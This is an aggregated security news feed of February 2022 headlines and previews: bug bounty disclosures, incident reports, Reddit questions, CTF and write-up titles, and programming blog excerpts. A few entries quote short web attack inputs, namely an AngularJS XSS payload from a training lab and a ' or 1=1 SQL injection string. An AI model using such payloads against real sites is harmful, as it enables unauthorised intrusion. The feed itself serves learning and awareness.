    SecWiki News 2022-02-23 Review
    Bvp47, the US NSA Equation Group's top-tier backdoor: technical details (by ourren). For more of the latest articles, visit SecWiki.

    Delivery Club Courier app (v. 3.9.25.0): Disclosure of client's phone number.
    Mail.ru disclosed a bug submitted by 388: https://hackerone.com/reports/1382570 - Bounty: $150
    Add up to 10K rupees to a wallet by paying an arbitrary amount
    Zomato disclosed a bug submitted by ashoka_rao: https://hackerone.com/reports/1408782 - Bounty: $2000
    Incorrect authorization to the intelbot service leading to ticket information
    TikTok disclosed a bug submitted by johnstone: https://hackerone.com/reports/1328546 - Bounty: $15000

    Hackers use Qbot and the Zerologon vulnerability to compromise an entire domain
    Translator: Knownsec 404 Lab translation team. Original link: https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/ In this intrusion (which began in November 2021), an attacker gained an initial foothold in the environment using the Qbot (aka Quakbot/Qakbot) malware. Shortly after the Qbot payload executed...
    Chrome V8 Source Code: why "Equal" and "StrictEqual" differ
    Author: 灰豆 (Huidou). This article is a reader contribution; Seebug Paper looks forward to your submissions, and every accepted piece earns a gift! Submission email: paper@seebug.org. Introduction: substring, getDate, catch and the like are commonly used JavaScript APIs. The next few articles will explain the design ideas, source code and key functions of these APIs in V8, and use examples to explain how JavaScript is initialized and run in V8, and how it...

    Types of attacks I have learned
    Man in the middle attack

    Research shows fast-growing companies carry a higher risk of being hacked
    According to the latest research from US passwordless identity platform provider Beyond Identity, fast-growing companies are more likely to suffer cybersecurity breaches than companies with flat growth.
    91% of UK organizations were hit by email phishing attacks in 2021
    According to Proofpoint's 2022 State of the Phish report, more than nine in ten (91%) UK organizations were successfully breached by email phishing last year.
    Would you fall for a phishing email like this?
    Phishing emails are everywhere; you have to keep your eyes open to guard against them.
    Watch out: Google MFA can't stop this kind of phishing attack
    A new type of phishing attack can bypass MFA: the attacker uses a VNC screen-sharing system to have the target log in to their account directly on an attacker-controlled server, thereby bypassing MFA.
    15-day countdown! The CIS 2021 Spring edition livestream invites you to gather online
    On March 9, let's meet at the livestream; see you there~
    FreeBuf Morning Report | DDoS attacks spiraled upward in 2021; Sea Mar accused of negligence in data breach
    Neustar Security Services released a report detailing the continued growth of cyberattacks in 2021, with an unprecedented number of DDoS attacks.
    The state of the telecom fraud underground economy (part 3): contract-free payment, collection-agent and payment-agent techniques become the mainstream money laundering methods for fraud
    In fake online-earning and fake investment scams, victims readily trust the other party because early in the scam they actually receive the task commissions the scammers pay back.

    Rust Related CVE Entries
    Article URL: https://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=rust Comments URL: https://news.ycombinator.com/item?id=30438575 Points: 2 # Comments: 0
    Cyrus SASL 2.1.28 has been released with SCRAM improvements and CVE fixes
    Article URL: https://www.cyrusimap.org/sasl/sasl/release-notes/2.1/index.html#new-in-2-1-28 Comments URL: https://news.ycombinator.com/item?id=30435871 Points: 1 # Comments: 0


    Preparing for the Cyber Impact of the Escalating Russia-Ukraine Crisis
    Recommendations on how to proactively prepare to defend against the potential cyber impact of the escalating Russia-Ukraine crisis.

    Best CS undergrad programs for a prospective pentester?
    Wondering if anyone here can speak to which college CS programs best prep their students to take on pentesting. I'd prefer a program that focuses on getting me the skills I need to understand the computer and just to give me general depth in my field. I know pentesting is what I want to do professionally, so something that would let me focus on that is preferable. submitted by /u/NotVeryMega [link] [comments]
    Is it possible I could be targeted?
    Kinda what the title says. I started out this morning with the ability to call out. Then my phone just started hanging up instantly. Put Sim in different phone, same thing. Tried calling it, straight to voicemail. Went to Walmart to get a new sim and phone number. Got ten minutes of the ability to make calls, then the same exact thing. Got a new phone, different carrier. Same thing ten minutes, then no more voice ability. Could it be possible some one put out some kinda hit on me? submitted by /u/YddishMcSquidish [link] [comments]
    How much day rate for pentester contractors in the UK?
    Due to an increase surge of work of a new contract, my company needs penetration tester contractors which would be good to use on an ad-hoc basis. What are the typical rates for pentesters and how long do a typical contract go on for? E.g. £500 a day for 3 months for example for someone with 3-5 experience. Is this reasonable pricing? I have been asked to find ones in the UK due to familiarity with certain frameworks like cyber essentials and CREST. It would be great if someone can share some figures so I can know what to expect with varying experience and qualification such as CRT and CCT as well. Thank you. submitted by /u/HamsterMoisture [link] [comments]
    EDR etc for ONE linux box?
    What setup/software/etc do you recommend to protect my personal linux computer? E.g. vectors I see: it could get pwned by malicious python packages, malicious VSCode extensions, malicious NPM etc. Less likely: Browser exploits. I was experimenting with only letting my browser phone out (the usual malware on linux just connects out naively). But then I have to open everything up again to install stuff. ClamAV is a joke, but something like carbon black makes no sense for a single box. Ideas? submitted by /u/medusabadhairday [link] [comments]
    SIEM Onboarding for IaaS/PaaS over Azure/AWS
    As someone who has been witnessing quite an amount of transformation across all sectors, I have been wondering what improvements vendors and OEMs have made on the SIEM onboarding front. Do OEMs/vendors still prefer/recommend syslog, installing proprietary agents or the oh-so-obsolete RPC (for Windows) to onboard systems, or have some vendors/OEMs also started pushing for cloud-native solutions like Event Hub/SQS? A lot of vendors do show a green light on integration with S3/Event Hub but don't support any sort of parsing for these log sources (Windows and Linux); one cannot expect anyone to actually create parsers from scratch for the entire Windows ecosystem. As large orgs start deploying Control Towers with dedicated logging buckets anyone can poll off and ingest, how do you guys scale your SIEM deployments and utilize these architectural changes? submitted by /u/w33ha_AD [link] [comments]
    Where to turn on VPN (laptop vs phone) when hotspotting my phone
    Let's get straight to it - I have two questions regarding where to turn on VPN (laptop vs phone). Let's say I'm at a hotel and would like to hotspot my phone so that I can access the internet using my laptop. Question is, where do I turn on VPN? On my phone or on my laptop? Based on my research, many seem to suggest turning on VPN on the laptop. My question then is, what if I would like to browse the internet on my phone? Or do stuff on WhatsApp, etc. Must I turn on VPN on my phone for these activities too? submitted by /u/AliveandDrive [link] [comments]
    Is it SQL injection?
    Hey Chief, a friend of mine has set up a website where she used a hosting service, I don't remember its name. The admin login functionality from that hosting service asked for a username and password combination. I typed a few SQLi payloads (' or 1=1 kinda stuff) but instead of throwing a "login password/username incorrect" error, it showed a pretty unusual error and took pretty long to do so. Is that a sign of SQL-based injection? Does that mean the website is likely vulnerable to SQL injection or something similar? Please help, because that friend of mine has set up her website for business usage and isn't sure that the hosting provider is secure and whatnot. submitted by /u/The_Intellectualist [link] [comments]
    Security automation
    I have been using node-red to automate a couple of daily tasks. For example: - enrich alerts with VirusTotal intelligence - test and verify DLP configuration is set up correctly - add IP to block list in AWS WAF - pull metrics from CrowdStrike to PowerBI for manager report - etc. I am considering writing a blog or sharing in a security talk. Is there anyone interested in this topic? Any good platform to speak about this? submitted by /u/Calm_Scene [link] [comments]
  • Open

    “OSINT Investigations: We know what you did that summer” Notes
    OSINT Investigations: We know what you did that summer by Information Warfare Center is packed with OSINT advice and resources, including… Continue reading on Medium »
    Cybersoc DVLA OSINT writeup
    Following is an OSINT challenge DVLA writeup offered by cybersoc. Continue reading on Medium »
    Wonderland- Tryhackme CTF
    Steps Continue reading on Medium »
    OSINTGRAM
    What is osintgram ? Continue reading on Medium »
    Capture The Talent — Pwn Write-up : Global Pandemic
    From Saturday, February 19 to Sunday, February 20, 2022, the Capture The Talent CTF was held. 🏆Final ranking: 1/52 Continue reading on Medium »
  • Open

    Seeking Freelancer for WeChat Recovery
    Computer Forensics For WeChat - Seeking A Freelancer. We need someone who can restore WeChat messages from an iPhone backup. Please contact me privately for details. submitted by /u/P2T-2022 [link] [comments]
    Volatility 3 commands and usage tips to get started with memory forensics. Volatility 3 + plugins make it easy to do advanced memory analysis.
    submitted by /u/DFIRScience [link] [comments]
    Certs
    Any certs you recommend for a cs analyst to get more knowledge and skills in digital forensics? submitted by /u/mooncrestle [link] [comments]
    When carving a file type without a footer, how do I know the range?
    I am doing an assignment, and in the assignment volume I found a Bitmap header. How do I know the range of the file? My professor said he would go over it but never did. submitted by /u/KTthemajicgoat [link] [comments]
  • Open

    Samy Kamkar takes down MySpace
    Greatest Moments in Hacking History: Samy Kamkar Takes Down Myspace — YouTube Continue reading on Medium »
  • Open

    IDOR in "external status check" API leaks data about any status check on the instance
    GitLab disclosed a bug submitted by joaxcar: https://hackerone.com/reports/1372216 - Bounty: $610
    broken authentication (password reset link not expire after use in https://network.tochka.com/sign-up)
    QIWI disclosed a bug submitted by uddeshaya: https://hackerone.com/reports/1401891 - Bounty: $100
    FULL SSRF
    Acronis disclosed a bug submitted by lu3ky-13: https://hackerone.com/reports/1241149
    Claiming the listing of a non-delivery restaurant through OTP manipulation
    Zomato disclosed a bug submitted by ashoka_rao: https://hackerone.com/reports/1330529 - Bounty: $3250
    api key exposed in github.com//
    8x8 disclosed a bug submitted by adnanmalikinfo: https://hackerone.com/reports/1454965
  • Open

    Paper HackTheBox Write-Up
    Easy box made by Jin Continue reading on Medium »
    The most underrated tool in bug bounty. (and the filthiest one liner possible)
    One liner tool chains for bug bounty, dependent on one vital tool. Continue reading on Medium »
    SQLi: next level
    You may have seen some SQL injections whose exploitation is not as straightforward as what you see in the ethical hacking courses. Like… Continue reading on Medium »
    rDEX Bug Bounty Recap
    Overview Continue reading on StaFi »
    PORTSWIGGER WEB SECURITY - XXE (XML EXTERNAL ENTITY) INJECTION LAB SOLUTIONS
    XXE (XML External Entity) Injection allows an attacker to inject or modify XML data on a web application… Continue reading on Medium »
    Behind-the-Scenes of Infosec Writeups
    How the publication grew since 2017, one message at a time. Continue reading on InfoSec Write-ups »
    My Pentest Log -7-
    Greetings to all from Sergius and Bacchus, Continue reading on Medium »
    2FA Misconfiguration leads to adding any number as 2FA verification
    I was testing 2FA on a website. At first, I tried to bypass 2FA but I was not successful, then I thought of something else. What if I can… Continue reading on Techiepedia »
  • Open

    Operation Cache Pandas
    submitted by /u/dmchell [link] [comments]
    Chasing the Silver Petit Potam to Domain Admin
    submitted by /u/ZephrX112 [link] [comments]
  • Open

    How to Fix the specialadves WordPress Redirect Hack
    Attackers are regularly exploiting vulnerable plugins to compromise WordPress websites and redirect visitors to spam and scam websites. This has been an ongoing campaign for multiple years. Payload domains are regularly swapped out and updated, but the objective remains largely the same: trick unsuspecting users into clicking on malicious links to propagate adware and push bogus advertisements onto victim’s desktops. The most recent variation of this WordPress hack involves the following domain: specialadves[.]com If your website is redirecting visitors to pages that look something like this then your website is likely compromised: In today’s post we will review how to remove the specialadves malware from your WordPress website. Continue reading How to Fix the specialadves WordPress Redirect Hack at Sucuri Blog.
  • Open

    Challenge-3 Weekly Cloud Security Challenge
    submitted by /u/0xdeadbeef0000 [link] [comments]
    Horde Webmail 5.2.22 - Account Takeover via Email
    submitted by /u/monoimpact [link] [comments]
  • Open

    For the females & gay members of reddit...
    Not saying you have to be gay to enjoy good looking men getting off ... Has Rick & Morty, Mr Robot plus other stuff so not all men getting all hot and sweaty... Mp4's, images etc... submitted by /u/xanderTgreat [link] [comments]
    Construction Company or not...
    Not been around for a while but found this one and wanted to share it...yep porn... Look in folders...mp4's submitted by /u/xanderTgreat [link] [comments]
    a bunch of electronic music and samples, still looking through it but there's some fun stuff so far
    submitted by /u/subwaytech [link] [comments]
  • Open

    SecWiki News 2022-02-22 Review
    Introduction and Survey of Device Fingerprinting Technology (Part 1) by ourren. For more of the latest articles, visit SecWiki
  • Open

    panic: send on closed channel - Let's close channels properly 🕵🏼‍♂️
    Goroutines and channels are among the most essential features of golang. However, if you use them without checking carefully, they can create various problems. One of these is sending a value to a channel that has already been closed. In this case the application terminates with a panic. panic: send on closed channel goroutine 1 [running]: main.main() /tmp/sandbox2358964969/prog.go:19 +0xfc First, there is a simple way to prevent this. Before sending a value to a channel, check whether the channel is closed, as in the safeCheck function below, and decide whether to send the value based on the result.
  • Open

    The cutting-edge conundrum: Why federal agencies can’t compromise on security
    Invicti sat down with Ryan Cote, former CIO for the Department of Transportation, to chat about AppSec in government and how agencies can modernize security. READ MORE
  • Open

    Ethereum/EVM Smart Contract Reverse Engineering & Disassembly
    submitted by /u/pat_ventuzelo [link] [comments]
  • Open

    State Council issues the "Opinions of the General Office of the State Council on Accelerating the Expansion of Application Areas and Nationwide Mutual Recognition of Electronic Certificates"
    The Opinions consist of five chapters and eighteen articles, balancing development and security, strengthening regulated management across the whole process of electronic certificate use, strictly protecting trade secrets and personal information, and firmly building a security line of defense for electronic certificate applications.
    New banking trojan attacking UK bank users via the Google Play store
    Researchers at Dutch security firm ThreatFabric have discovered a new Android banking trojan named Xenomorph that is targeting users of 56 European banks.
    FreeBuf Morning Report | Meta may exit Europe over data transfer difficulties; online litigation and other judicial activities must protect personal privacy
    Meta has received a "revised" preliminary decision from the EU's lead privacy regulator that could affect its transfer of EU user data to the US and could even lead to it withdrawing from the European market.
    Managing the lifecycle of non-human accounts to minimize cyber attacks
    For many organizations, the access privileges of non-human accounts usually remain unchanged. This gives cybercriminals the opportunity to exploit orphaned accounts for unauthorized access and launch cyber attacks.
    Dozens of OpenSea users have NFTs stolen, losses exceed $1.7 million
    Dozens of OpenSea users suffered a phishing attack, losing NFTs worth about $1.7 million.
    Android users beware! Hackers use "disposable" accounts to run scams
    A botnet-based rogue website was linked to thousands of infected Android phones, once again exposing the weakness of relying on SMS for account verification.
    Watch the CIS 2021 Spring Edition livestream on March 9, with plenty of prizes!
    From March 9 to 10, the full-agenda livestream of CIS 2021 Spring Edition will officially begin, and prize activities will go live in advance; participants can win up to an iPhone 13!
    Cookware giant Meyer discloses cyberattack affecting employees
    Meyer Corporation, the world's second-largest cookware distributor, disclosed a data breach affecting thousands of its employees to the US Attorney General's office.
  • Open

    Behind-the-Scenes of Infosec Writeups
    No content preview
    Suspicious USB Stick
    No content preview
    CryptoWall Ransomware — Malware Traffic Analysis
    No content preview
    [THM] Dav Writeup
    No content preview
    How I could’ve bypassed the 2FA security of Instagram once again?
    No content preview
  • Open

    Iran-aligned hackers TunnelVision actively exploiting the Log4j2 vulnerability in VMware Horizon
    Translator: Knownsec 404 Lab Translation Team. Original link: https://www.sentinelone.com/labs/log4j2-in-the-wild-iranian-aligned-threat-actor-tunnelvision-actively-exploiting-vmware-horizon/ Abstract: SentinelLabs has been tracking an Iran-aligned attacker active in the Middle East and the United States. ...
  • Open

    Fun ideas for physical pentesting?
    Hey team! So my sec team started a physical security assessment a week ago and it's been fun. I got to use the under-the-door tool, tailgate, clone an RFID card and bypass motion sensor entrances/exits. I was wondering if you guys had any ideas about what you would do if you had "keys to the kingdom" such as the server room or someone's desktop? Edit: grammar submitted by /u/Enes_24 [link] [comments]
    CodeCat is an open-source tool to help you find/track user input sinks and bugs using static code analysis. These points follow regex rules.
    submitted by /u/CoolerVoid [link] [comments]
    Automating a Red Team lab with Packer, Terraform and Ansible
    submitted by /u/nickonos [link] [comments]
    Reading and Writing into Process's Memory
    Get the basic understanding on the remote process memory read and write all by windows 32 API and create your own game hacks. https://tbhaxor.com/reading-and-writing-into-processs-memory/ submitted by /u/tbhaxor [link] [comments]
  • Open

    Comprehensive collection of Bionicle Lego images
    submitted by /u/limb_fed [link] [comments]
    Electronic music and Drum 'n' Bass samples
    http://doa.totallyowns.co.uk/ submitted by /u/CalmWater8439 [link] [comments]
    13 Years of Weird Adult Forum Stuff - Organized by YYMM
    submitted by /u/Rose_Beef [link] [comments]
  • Open

    Command line execution fuzzer and bruteforcer (Equivalent of wfuzz for all command line)
    submitted by /u/cryptaureau [link] [comments]
    Wrote a new blog post on injecting fake credentials into lsass memory using New-HoneyHash and alerting with Elastic.
    submitted by /u/m_edmondson [link] [comments]
    My first vulnerability - Arista gNMI authentication bypass CVE-2021-28500
    submitted by /u/MilesTails [link] [comments]
    Finding an unseen SQL Injection by bypassing escape functions in mysqljs/mysql
    submitted by /u/toyojuni [link] [comments]
    Find You: Building a stealth AirTag clone
    submitted by /u/breakingsystems [link] [comments]
    Plone Scanner Version 0.01
    submitted by /u/halencarjunior [link] [comments]
    nrich: a new tool to quickly find open ports and vulnerabilities via Shodan
    submitted by /u/0xdea [link] [comments]
    Linux kernel NFC Use-After-Free (CVE-2021-23134) PoC
    submitted by /u/awarau888 [link] [comments]
  • Open

    Healing blind injections
    What if I told you there is a way to heal the blind SQL injections and turn them into healthy union-based ones? Continue reading on Medium »
    eCPTX Exam Review by 0xJin
    eLearnSecurity Certified Penetration Tester eXtreme Continue reading on Medium »
    What an injection into jQuery-selector can lead to
    I somehow came across a page with something like a user survey (the program is private, so I will speak abstractly). Continue reading on Medium »
    XSS in hidden input field
    Hello again! I’m faizan and today I’m writing about an XSS I found in an input field which was hidden from the page using Content division… Continue reading on Medium »
    Parameter Tampering
    First, What is the Parameter Tampering? Continue reading on Medium »
    How I found broken link hijack using Python
    Disclaimer Continue reading on Medium »
    How I could’ve bypassed the 2FA security of Instagram once again?
    … Continue reading on InfoSec Write-ups »
    Attacking Kerberos | Kerberoasting | AS-REP Roasting | Active Directory | Windows |
    This blog covers how to attack Kerberos with Kerberoasting and AS-REP Roasting attacks. Continue reading on System Weakness »
    Polygon Consensus Bypass Bugfix Review
    Summary Continue reading on Immunefi »
  • Open

    I was solving an XSS lab on portswigger when I came across this js payload could anyone please explain me how it works [ {{$on.constructor('alert(1)')()}} ]
    Here is the link to the lab : https://portswigger.net/web-security/cross-site-scripting/dom-based/lab-angularjs-expression submitted by /u/_JatinChopra_ [link] [comments]
    Are there any sites with clear information about specific CVEs and how they can be exploited?
    It seems a lot of these sites that I am finding are very vague about the different vulnerabilities. It would be helpful to find a place where I can search the CVE and they can tell me how it is vulnerable and how it can be exploited. submitted by /u/Ok-Oil2953 [link] [comments]
    How are you tracking and documenting SIEM use cases?
    Curious to see what solutions folks have for documenting and tracking SIEM use cases. Are you just throwing everything into a spreadsheet? Using a KB tool like Confluence? Do you have a formalized process for handling changes to rules or retiring them? submitted by /u/wowneatlookatthat [link] [comments]
    SSH: Which server gets which keys to work?
    Sorry if this is a bit of a basic question but I’m setting up my first headless server and could use your advice. I have a server which I’d like to access via SSH. I have created a password protected key file to do so. I will be accessing the server from a few different clients, all belonging to me and no-one else. Is it correct to only have the public key on the server, and to have both the private and public keys on the clients? Or does the server need the private key? Is it even possible for the client to work without both the public and private keys available to it…? submitted by /u/JamieOvechkin [link] [comments]
    Common security-centric query languages?
    I'm working on a personal project relating to security-centric query languages, and I'm trying to get an overview of current (popular) languages. So far, I've got: Splunk Search Processing Language, Falcon Query Language, Microsoft Kusto, Rapid7 Log Entry Query Language. Are there other major languages in use currently? submitted by /u/QuirkySpiceBush [link] [comments]
    Receiving OTPs and verification links for different websites from the same number
    Hi all, I recently noticed that I am getting the OTPs/reset links for different websites (such as Instagram and Amazon) from the same number. That is, the password reset link for Instagram was sent to my phone from the same number as the verification link for Amazon. The number is something like 78549659. Is this normal or does each company have a different number for sending such texts? submitted by /u/Euphoric_Asparagus90 [link] [comments]
    SANS SEC522 vs SEC542
    Hey everyone. My employer is paying for me to do a SANS certificate of my choosing, I'm interested in the web/appsec based certs. I was wondering if anyone's taken either of these or would recommend one over the other. Thanks submitted by /u/n3v327311 [link] [comments]
  • Open

    How dangerous is being a digital forensic investigator?
    I am currently doing BSc in Information systems and want to do masters in digital/computer forensics. submitted by /u/SkillKiller3010 [link] [comments]
    Why do some investigations take longer and some shorter?
    I often read in news articles that some suspects have been arrested for internet crimes after a "months-long investigation". Why does it take months if they already have so-called evidence, especially if they have received tips on it from organizations such as NCMEC? submitted by /u/Ill-Date-1852 [link] [comments]
    Fargate incident response
    How do we isolate affected containers for AWS ECS/EKS in fargate? Creating a new security group for ECS will result in new tasks being recreated to replace the old tasks, so the affected tasks won't be preserved. In EKS, there is no visibility into the security groups of the node. The only way to isolate is through the ACL which is not very ideal as there may be other apps using the same ACL. submitted by /u/SnooKiwis8248 [link] [comments]
    For research - breaking into Computer/Digital Forensics?
    Hey all - hope you're doing well. Doing some research on the Computer/Digital forensics field for a friend - I've looked a bit across Google, postings on job sites, etc. but wanted to get some knowledge from this pretty extensive community! How would someone with an M.A. (Masters) break into Computer or Digital forensics? Is a certification or class worth it (i.e. classes on Udemy, Coursera for specializations, or a university/online bootcamp program on digital or computer based forensics) What is your day-to-day like, how did you get into the field/how do you like it? What are common tools and skills - how much of a technical or IT background is required? Thank you! submitted by /u/sora1493 [link] [comments]
  • Open

    An Accidental SSRF Honeypot in Google Calendar
    This is a story of what both I and Google engineers considered to be an SSRF vulnerability in Google Calendar — but turned out to be some… Continue reading on Medium »
    Exploiting XXE Vulnerabilities
    Original Post : https://keiran.scot/2022/02/10/exploiting-xxe-vulnerabilities/ Continue reading on ITNEXT »
    Exploiting XXE Vulnerabilities
    Original Post : https://keiran.scot/2022/02/10/exploiting-xxe-vulnerabilities/ Continue reading on Medium »
  • Open

    SecWiki News 2022-02-21 Review
    SecWiki Weekly (Issue 416) by ourren; Introduction to Vulnerability Exploitability eXchange (VEX) by ourren; PAM 2022 accepted paper list by ourren. For more of the latest articles, visit SecWiki
  • Open

    OWASP-LPU CTF: OSINT
    Continue reading on Medium »
    Walkthrough — Hacktoria: Geolocation 14
    And here we go to Hacktoria’s geolocation number 14 challenge! They keep on coming and I keep on solving them. So without further ado… Continue reading on Medium »
    Never Forget The Moon — OSINT Challenge 18
    On Dec 28, 2021, Quiztime (contributor @bayer_julia) shared a new OSINT quiz with us. The objective was simple. We had to figure out when… Continue reading on Medium »
    Capture The Talent — OSINT Write-ups
    From Saturday, February 19 to Sunday, February 20, 2022, the Capture The Talent CTF took place. 🏆Final ranking: 1/52 Continue reading on Medium »
  • Open

    De-anonymize anonymous tips through the Tumblr blog network
    Automattic disclosed a bug submitted by ajoekerr: https://hackerone.com/reports/1484168 - Bounty: $450
    Remote memory disclosure vulnerability in libcurl on 64 Bit Windows
    curl disclosed a bug submitted by nsq11: https://hackerone.com/reports/1444539
    Page has a link to google drive which has logos and a few customer phone recordings
    Zomato disclosed a bug submitted by codersanjay: https://hackerone.com/reports/864712 - Bounty: $200
  • Open

    AntiFuzz: Impeding Fuzzing Audits of Binary Executables
    Article URL: https://neverworkintheory.org/2022/02/21/antifuzz.html Comments URL: https://news.ycombinator.com/item?id=30414501 Points: 9 # Comments: 1
  • Open

    FreeBuf Morning Report | Douban app exposed for embedding sensitive personal information in in-app screenshots; attackers distribute trojans via NFT topics
    Douban was exposed for using a hard-to-detect invisible watermark on its pages; the watermark contains the user's UID, TID and a full timestamp with time zone.
    Huayun'an ASM Technology: A detection model for responding to zero-day attacks (VEAM)
    At least 66 zero-day vulnerabilities still in active use were discovered in 2021, roughly twice the number found in 2020.
    Users of UK digital bank Monzo under phishing threat
    UK digital banking platform Monzo is being targeted by phishing attacks; users have received SMS messages containing phishing links.
    NFTs worth millions of dollars stolen in attack; Google issues urgent warning to 3.2 billion users worldwide | Global cybersecurity hotspots, February 21
    Global cybersecurity hotspots for February 21.
    Latest report | Sangfor 2021 Ransomware Landscape Report
    The latest report is out!
    White House pins Ukraine DDoS attacks on Russian GRU hackers
    The recent DDoS attacks in Ukraine have been attributed to Russian-led hacking.
  • Open

    Linux Kernel Use-After-Free (CVE-2021-23134) PoC
    Article URL: https://ruia-ruia.github.io/NFC-UAF/ Comments URL: https://news.ycombinator.com/item?id=30413955 Points: 1 # Comments: 0
  • Open

    Database connection exploitation tool - Sylas
    Author: ryze@nop. This article is a contributed submission; Seebug Paper looks forward to your sharing, and every accepted submission receives a gift! Submission email: paper@seebug.org 0x00 Preface: It started on a red team engagement. After obtaining the Oracle database password and connecting with a certain database exploitation tool from GitHub, executing commands such as tasklist /svc and net user produced ORA-24345: a truncation or null fetch error occurred, and the file management feature...
    Oracle WebLogic CVE-2022-21350 vulnerability analysis
    Author: Moyun Technology VLab Team. Original link: https://mp.weixin.qq.com/s/fFx1kQVfotbOqHlSjSJVMQ Vulnerability summary: This is a deserialization vulnerability, a new gadget chain, which may pose an RCE risk on older JDK versions. Vulnerability analysis: Test environment WebLogic 14c, test JDK 1.8. It first calls BadAttributeValueExpException.read...
  • Open

    Why does my app send network requests when I open an SVG file?
    No content preview
    How to Setup MFA for Linux Machine
    No content preview
    Walkthrough — Hacktoria: Geolocation 12
    No content preview
    Send a Email to me and get kicked out of Google Groups !!
    No content preview
  • Open

    Using Dynamic Time Warping (DTW) for time series similarity measurement and similarity identification of pollution concentrations upstream and downstream of a river - 鸣梦
    Time series similarity measurement methods: the commonly used methods are Euclidean distance (ED) and Dynamic Time Warping (DTW). Overall they fall into two categories: lock-step measures and elastic measures. Lock-step measures are time…
    Be careful opening online PDFs - 踩刀诗人
    This post is really a small supplement to the earlier security remediation topic; if you are interested in the previous content, take the following shortcuts: Security Vulnerability Remediation Series (2), Security Vulnerability Remediation Series (1). Background: Not long ago a customer ran another round of security testing on the system we provide, and one finding I found very interesting, which refreshed my understanding, was "XSS injection in PDF preview". I'm sharing it here so we can learn from each other…
    What does a CTO (Technical Director) actually do day to day? - 程序员守护石
    Currently a founder; my last job was general manager of the R&D center at a medical technology company, and before that I held R&D/technical director positions at several companies. As far as I understand, small and medium-sized enterprises in China currently do not draw a very clear functional distinction between the CTO and technical director roles. 1. Summary first. Let me give an overview of what a CTO/technical director does: ❶ A CTO/technical director should have overall control of the company's technical direction, and also…
    How SparkSQL supports enterprise data warehouses - 字节跳动数据平台
    When designing and selecting an enterprise-grade data warehouse architecture, you need to think in terms of development convenience, ecosystem, degree of decoupling, performance and security. Author: 惊帆 from the Data Platform EMR team. Preface: After years of development, Apache Hive has basically become the industry's de facto standard and data processing tool for building very large data warehouses. Hive is no longer merely a technical component but a kind of design…
    WeChat first-round interview: What is consistent hashing? Where is it used? What problem does it solve? - 小林coding
    Hello everyone, I'm Xiaolin. While browsing interview write-ups on Nowcoder, I noticed a student being asked this question in a WeChat interview: the first question was, what is consistent hashing, what are its use cases, and what problem does it solve? It is quite an interesting question, so let's talk about it today. Let's go! How to distribute requests? Most websites are certainly backed by more than one server, because the concurrency and data volume a single machine can handle are limited…
    How to integrate Huawei Cloud Functions in Flutter - 华为开发者论坛
    Introduction: Cloud Functions is a serverless compute service that provides FaaS (Function as a Service) capabilities. It helps developers greatly simplify application development and operations, lowers the barrier to implementing application features, and lets them quickly build business capabilities. Below we describe how to integrate Cloud Functions within the Flutter framework. Integration steps: 1. Install the Flutter environment…
    JVM Fundamentals (2): Memory allocation strategies and garbage collection techniques - Huangzzzzz
    Between Java and C++ stands a high wall built from dynamic memory allocation and garbage collection: those outside want to get in, and those inside want to get out. Garbage collection overview: In the Java memory model, the heap and the method area are what garbage collection needs to focus on, since the other regions are reclaimed automatically when their thread ends. The first goal garbage collection must address is how to determine that an object is no longer needed so that it can automatically…
    [Cao Gong's Miscellany] A note on MySQL Connector/J time zone issues: times written to the database are always 13 hours behind - 三国梦回
    Background: Last year I wrote "[Cao Gong's Miscellany] Why is the time on the MySQL client a full 13 hours off from local time? Absurd", and recently it actually came in handy. Not for me but for a colleague on my team, who hit the same thing: a service inserts records into the database, the records contain a time, say time A, and after writing, the time in the database is A-13, 13 hours behind. Then he changed this one place…
    『无为则无心』 Python Basics - 44: Operations on files and folders - 繁华似锦Fighting
    1. Introduction to the os module: The os module provides interface functions for most operating system features. Once imported, it adapts to the operating system platform it runs on and performs the corresponding operations for that platform. In Python programming, the os module can handle the file and directory operations we normally do by hand, such as listing all files in the current directory, deleting a file, getting a file's size, and so on. In Python…
    Odd bug: investigating blurry text caused by using transform - ChokCoco
    On our pages we often run into this problem: the text or borders in an area become particularly blurry when displayed, like this (data has been anonymized): Normally it should look like this: Hmm, it may not be obvious in the full-size image, so let's compare one detail, which makes it very clear: When is this triggered? So, when does this problem occur? Searching on Google, we can actually find…
    LibOpenCM3 (1): Setting up a command-line development environment on Linux - Milton
    LibOpenCM3 is a GPL-licensed (LGPL3) firmware library for the Cortex-M series, supporting STM32, Atmel and NXP microcontrollers. This firmware library is a counterpart to CMSIS, but provides more method interfaces than CMSIS, with a level of implementation between CMSIS and SPL. For the common STM32F1 series, the code is already basically stable...
    Developing TypeScript with VS Code - 寻找无名的特质
    This article gives an overview of the process of developing TypeScript with VS Code.
    A detailed look at externalized configuration management with Environment in Spring - 跟着Mic学架构
    Environment means the environment; it represents the runtime environment information of the whole Spring application and contains two key elements: profiles and properties. Profiles: I believe everyone already understands the concept of profiles; the most common use is deciding, for different environments, which configuration context the current Spring container uses. For example, for the development environment…
    Building a Web Office suite from scratch (4): A new problem: z-index - 赵康
    Table of contents for the "Building a Web Office suite from scratch" blog series. This is a series of blog posts whose ultimate goal is to build an HTML Canvas-based Web Office suite similar to Microsoft Office, including documents, spreadsheets, slides, and so on. The corresponding GitHub repo address: https://g…
    vivo server-side monitoring architecture design and practice - vivo互联网技术
    1. Business background: We live in an age of information explosion, in which information flows freely around the globe via the internet, giving rise to all kinds of platform systems and software systems, and more and more business leads to greater system complexity. When a problem in a core business affects the user experience and developers do not notice in time, it is already too late by the time the problem is found; or when a server's CPU keeps climbing or its disk fills up, operations staff need to…
    Implementing a simple .NET-based microservice e-commerce system with Dapr (19): Distributed transactions with the Saga pattern - a1010
    In earlier articles in this series I discussed one approach to distributed transactions: exposing actor services in the cluster to make distributed transactions locally atomic. But actor services have their own peculiarities and the scenario is not generic. So today let's talk about the Saga pattern as a way to implement distributed transactions, with code attached at the end for readers to review and comment on. Contents: 1. Implementing a simple .NET-based micro…
    Last week's highlights (2.14-2.20) - 博客园团队
    Hot posts: · 2021 annual summary | GrapeCity software development technology review (part 2) (GrapeCity tech team) · Architecture evolution from MVC to DDD (木小丰) · 36k stars! A rising open-source web server with free HTTPS out of the box (削微寒) · ASP.NET Core 6 framework revealed, example demos [01]: first programming experience (Art…
    Private lightweight CI/CD solution - 04 - Private code repository service: Gitea - 莫问今朝乄
